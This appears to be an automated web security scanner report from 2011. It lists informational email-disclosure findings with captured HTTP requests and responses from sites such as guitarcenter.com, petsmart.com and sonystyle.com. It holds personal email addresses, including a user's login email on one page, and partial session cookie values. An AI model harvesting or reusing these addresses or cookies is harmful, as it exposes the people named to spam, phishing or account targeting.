GET /Includes/Guitarcenter Host: www.guitarcenter.com Proxy-Connection: keep-alive Referer: http://www.guitarcenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Content-Length: 45904 Content-Type: text/css Last-Modified: Tue, 26 Apr 2011 21:33:30 GMT Accept-Ranges: bytes Vary: Accept-Encoding Server: Microsoft-IIS/6.0 SN: 43 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:40:16 GMT .../**Last edited on 7-30-2009 by Erick B. Hernandez (email: ebhernandez@guitarcenter /******** BEGIN CSS RESET - DO NOT MODIFY**********/ /* this resets the styles so they are the same across all browers/platforms */ body,div,dl,dt,dd,ul,ol ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.helzberg.com |
Path: | /includes/jquery/plugins |
GET /includes/jquery/plugins Host: www.helzberg.com Proxy-Connection: keep-alive Referer: http://www.helzberg.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=67638cb10 |
HTTP/1.1 200 OK Server: Apache Last-Modified: Mon, 09 May 2011 16:45:27 GMT ETag: "649-910d97c0" Accept-Ranges: bytes Content-Length: 1609 Content-Type: application/javascript Cache-Control: max-age=7200 Date: Mon, 16 May 2011 01:40:43 GMT Connection: close .../** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian * * @param f onMouseOver function || An object with configuration options * @par ...[SNIP]... <brian@cherne.net> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.magicalki |
Path: | /blog/category/disneyland |
GET /blog/category/disneyland Host: www.magicalkingdoms.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cf6190390f |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:34:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.magicalki Content-Type: text/html; charset=UTF-8 Content-Length: 59537 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <a href="mailto:admin@magicalkingdoms.com"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.magicalki |
Path: | /blog/wp-content/plugins |
GET /blog/wp-content/plugins Host: www.magicalkingdoms.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cf6190390f |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:20:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14 Last-Modified: Thu, 31 Mar 2011 13:42:10 GMT ETag: "6202b2-23e7-49fc775 Accept-Ranges: bytes Content-Length: 9191 Content-Type: application/javascript // ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+ // Copyright (c) 2010 Jack Moore - jack@colorpowered.com // Licensed under the MIT license: http://www.opensource.org (function(b,ib){var t="none",M="LoadedContent ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /us/legalinfo.jsp |
GET /us/legalinfo.jsp?domain Host: www.mcafeesecure.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 200 OK Server: McAfeeSecure Expires: Thu, 01 Jan 1970 00:00:00 GMT Vary: Accept-Encoding Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 8707 Connection: close Date: Mon, 16 May 2011 01:40:26 GMT <html> <head> <style type="text/css"> html,body{color:#4c4d4f body {background:url('/images ...[SNIP]... <A class="red_link" HREF="mailto:Compliance@mcafee.com?subject=Reporting unauthorized use of McAfee SECURE trustmark"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.passporte |
Path: | /forums/ |
GET /forums/ HTTP/1.1 Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:31:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Set-Cookie: bblastvisit=1305508789; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Set-Cookie: bblastactivity=0; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Set-Cookie: vbseo_loggedin=deleted; expires=Sun, 16-May-2010 01:31:55 GMT; path=/ Content-Length: 162646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href='mailto:support@passporter.com'> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.petsmart.com |
Path: | /js/LIB_core.js |
GET /js/LIB_core.js HTTP/1.1 Host: www.petsmart.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=yYyYNQQfp |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:18 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 08 Nov 2006 21:00:01 GMT ETag: "53cb54-aa04-421c29a Accept-Ranges: bytes Cache-Control: max-age=21600 Expires: Mon, 16 May 2011 07:39:18 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Content-Length: 43524 Connection: close Content-Type: application/x-javascript /* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.restorati |
Path: | /assets/js/jquery/plugins |
GET /assets/js/jquery/plugins Host: www.restorationhardware Proxy-Connection: keep-alive Referer: http://www.restorati User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=Wlhqnnp+ |
HTTP/1.1 200 OK Last-Modified: Thu, 18 Nov 2010 19:37:06 GMT Vary: Accept-Encoding Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 4246 Date: Mon, 16 May 2011 01:39:38 GMT Connection: close Cache-Control: max-age=3600 Expires: Sun, 15 May 2011 18:32:41 GMT /** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.restorati |
Path: | /assets/js/jquery/plugins |
GET /assets/js/jquery/plugins Host: www.restorationhardware Proxy-Connection: keep-alive Referer: http://www.restorati User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=Wlhqnnp+ |
HTTP/1.1 200 OK Last-Modified: Thu, 18 Nov 2010 19:37:06 GMT Vary: Accept-Encoding Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 4795 Date: Mon, 16 May 2011 01:39:37 GMT Connection: close Cache-Control: max-age=3600 Expires: Sun, 15 May 2011 18:34:04 GMT /** * ------------------------- * jQuery-Plugin "pngFix" * Version: 1.2, 09.03.2009 * by Andreas Eberhard, andreas.eberhard@gmail * http://jquery.andrea * * Copyright (c) 2007 Andreas Eberhard * Licensed under GPL (http://www.opensource * * Changelog: ...[SNIP]... from selectors * 11.09.2007 Version 1.1 * - removed noConflict * - added png-support for input type=image * - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup * 31.05.2007 initial Version 1.0 * ------------------------- * @example $(function(){$(document) * @des ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=3693d43bbe0 |
HTTP/1.1 200 OK Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT Accept-Ranges: bytes ntCoent-Length: 34927 Content-Type: application/x-javascript Content-Length: 34927 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:19:53 GMT Connection: close Cache-Control: private // script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Ivan Krstic (htt ...[SNIP]... <tdd@tddsworld.com> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=3693d43bbe0 |
HTTP/1.1 200 OK Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT Accept-Ranges: bytes ntCoent-Length: 31605 Content-Type: application/x-javascript Content-Length: 31605 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:19:52 GMT Connection: close Cache-Control: private // script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Sammi Williams (http://www.oriontransfer // // script.aculo.us is freely distributable under the terms of an MIT-style license. // For details, see the script.aculo.us web site: http://script.aculo.us/ if(Object.isUndefined thr ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=3693d43bbe0 |
HTTP/1.1 200 OK Last-Modified: Tue, 14 Dec 2010 00:04:21 GMT Accept-Ranges: bytes ntCoent-Length: 36836 Content-Type: application/x-javascript Content-Length: 36836 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:19:52 GMT Connection: close Cache-Control: private /* SiteCatalyst code version: H.19.4. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ ...[SNIP]... 5trk`F$E)#N=#d($J,(vt#qt +"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N +"Q`k`8`4$Ns$90`Ud=^E; ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT Accept-Ranges: bytes ntCoent-Length: 34927 Content-Type: application/x-javascript Content-Length: 34927 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:19 GMT Connection: keep-alive Cache-Control: private // script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Ivan Krstic (htt ...[SNIP]... <tdd@tddsworld.com> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT Accept-Ranges: bytes ntCoent-Length: 31605 Content-Type: application/x-javascript Content-Length: 31605 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:19 GMT Connection: keep-alive Cache-Control: private // script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Sammi Williams (http://www.oriontransfer // // script.aculo.us is freely distributable under the terms of an MIT-style license. // For details, see the script.aculo.us web site: http://script.aculo.us/ if(Object.isUndefined thr ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK Last-Modified: Tue, 14 Dec 2010 00:04:21 GMT Accept-Ranges: bytes ntCoent-Length: 36836 Content-Type: application/x-javascript Content-Length: 36836 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:00 GMT Connection: keep-alive Cache-Control: private /* SiteCatalyst code version: H.19.4. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ ...[SNIP]... 5trk`F$E)#N=#d($J,(vt#qt +"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N +"Q`k`8`4$Ns$90`Ud=^E; ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=6e127c2b6ef |
HTTP/1.1 200 OK ntCoent-Length: 88478 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 88478 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:25:02 GMT Connection: keep-alive Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.e ...[SNIP]... axElement("showSuccess"); ajaxEngine.sendRequest( } function readCookie() { var errorLogonId='dhh@fastdial.net'; var link= 'Logoff?catalogId=10551 var remember = (getUserCookieValue( var logonI ...[SNIP]... <input type="text" maxlength="254" value="dhh@fastdial.net" name="loginLogonId" id="loginLogonId" class="text validate-email-custom validation-failed" /> ...[SNIP]... <a href="mailto:sonystyle@custhelp.com">sonystyle@custhelp.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.telegraph.co |
Path: | /template/ver1-0/js |
GET /template/ver1-0/js Host: www.telegraph.co.uk Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=173.193.214.243 |
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 10 May 2011 14:02:05 GMT ETag: "6b194c-5d65-4a2ec66 Accept-Ranges: bytes Content-Type: application/javascript Content-Length: 23909 Date: Mon, 16 May 2011 01:19:38 GMT Connection: close Vary: Accept-Encoding /* * * TableSorter 2.0 - Client-side table sorting with ease! * Version 2.0.3 * @requires jQuery v1.2.3 * * Copyright (c) 2007 Christian Bach * Examples and docs at: http://tablesorter.com * ...[SNIP]... ean flag indicating if tablesorter should display debuging information usefull for development. * * @type jQuery * * @name tablesorter * * @cat Plugins/Tablesorter * * @author Christian Bach/christian.bach@polyester */ (function($) { $.extend({ tablesorter: new function() { var parsers = [], widgets = []; this.defaults = { cssHeader: "header", cssAsc: "headerSortUp", cssDesc: "heade ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.travelguard |
Path: | /WorkArea/java/ektron.js |
GET /WorkArea/java/ektron.js HTTP/1.1 Host: www.travelguard.com Proxy-Connection: keep-alive Referer: http://www.travelguard User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
HTTP/1.1 200 OK Content-Length: 172238 Content-Type: application/x-javascript Content-Location: http://www.travelguard Last-Modified: Wed, 25 Nov 2009 14:17:00 GMT Accept-Ranges: bytes ETag: "096daf3d96dca1:13c8" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:43:40 GMT if ("undefined" == typeof $ektron) { /* Ektron JavaScript Library Copyright (c) 2008 Ektron, Inc. All rights reserved Instructions to upgrade this Ektron Li ...[SNIP]... (Ektron.RegExp.rtrim,""); }, // method to work around bugs in jquery' offset() when element is nested inside relative/absolute elements // from: http://www.mail-archive positionedOffset: function(elem) { var offsetParent = elem.offsetParent(), offset = elem.offset(), position = elem.position(); if ( !/^body|html$/i.tes ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.travelguard |
Path: | /tgi3/00common/js |
GET /tgi3/00common/js Host: www.travelguard.com Proxy-Connection: keep-alive Referer: http://www.travelguard User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
HTTP/1.1 200 OK Content-Length: 41172 Content-Type: application/x-javascript Content-Location: http://www.travelguard Last-Modified: Thu, 08 Apr 2010 17:33:48 GMT Accept-Ranges: bytes ETag: "0e652a541d7ca1:13c8" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:43:48 GMT .../* SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ ...[SNIP]... s.mr($C,(vt@tt`Zvt)`fs + "`Rm('t')`5s.p_r)s.p_r(`I + ";s.`Q`r=n;s.t($3}`5pg){ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://api.ak.facebook |
Path: | /restserver.php |
GET /restserver.php?v=1.0 Host: api.ak.facebook.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Content-Type: text/javascript;charset Pragma: X-FB-Rev: 378427 X-FB-Server: 10.36.50.102 X-Cnection: close Content-Length: 375 Cache-Control: public, max-age=120 Expires: Mon, 16 May 2011 01:27:14 GMT Date: Mon, 16 May 2011 01:25:14 GMT Connection: close jsonp1305508793343([{"url ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://includes.petsmart |
Path: | /homepage/redesigned |
GET /homepage/redesigned Host: includes.petsmart.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: ARPT=JOLQUPS172.16.96.229CKMYY; path=/ Date: Mon, 16 May 2011 01:39:25 GMT Server: Apache Last-Modified: Fri, 27 Mar 2009 22:11:50 GMT ETag: "86c00f-78-4662104f59580" Accept-Ranges: bytes Content-Length: 120 Content-Type: image/gif GIF89a.......;Y....m.... |
Severity: | Information |
Confidence: | Certain |
Host: | http://includes.petsmart |
Path: | /homepage/redesigned |
GET /homepage/redesigned Host: includes.petsmart.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: ARPT=JOLQUPS172.16.96.229CKMYY; path=/ Date: Mon, 16 May 2011 01:39:24 GMT Server: Apache Last-Modified: Fri, 27 Mar 2009 22:02:41 GMT ETag: "86c00e-175-46620e43c8240 Accept-Ranges: bytes Content-Length: 373 Content-Type: image/gif GIF89a.....$..........|.. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.ak.connect |
Path: | /connect.php/en_US/js/Api |
GET /connect.php/en_US/js/Api Host: static.ak.connect Proxy-Connection: keep-alive Referer: http://www.siteadvisor User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl If-None-Match: "8279b1007e81a5634a0 |
HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 ETag: "96b20198eb85ccc0d6b X-FB-Server: 10.27.159.189 X-Cnection: close Content-Length: 211449 Vary: Accept-Encoding Cache-Control: public, max-age=1158 Expires: Mon, 16 May 2011 01:51:41 GMT Date: Mon, 16 May 2011 01:32:23 GMT Connection: close /*1305462020,169582525 if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.ak.connect |
Path: | /js/api_lib/v0.4 |
GET /js/api_lib/v0.4 Host: static.ak.connect Proxy-Connection: keep-alive Referer: http://www.siteadvisor User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl If-None-Match: "7534b25717a0f240804 |
HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 ETag: "8c448743c350ca6ea48 X-FB-Server: 10.32.136.124 X-Cnection: close Content-Length: 18453 Vary: Accept-Encoding Cache-Control: public, max-age=692 Expires: Mon, 16 May 2011 01:43:53 GMT Date: Mon, 16 May 2011 01:32:21 GMT Connection: close /*1305414233,169904252 if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /connect/xd_proxy.php |
GET /connect/xd_proxy.php Host: static.ak.fbcdn.net Proxy-Connection: keep-alive Referer: http://www.facebook.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: 10.138.16.183 Content-Length: 3017 Vary: Accept-Encoding Cache-Control: public, max-age=934 Expires: Mon, 16 May 2011 01:56:02 GMT Date: Mon, 16 May 2011 01:40:28 GMT Connection: close <!doctype html> <html> <head> <title>XD Proxy</title> </head> <body onload="doFragmentSend()" <div id="swf_holder" style="position: absolute; top: -10000px; width: 1px; heig ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /connect/xd_proxy.php |
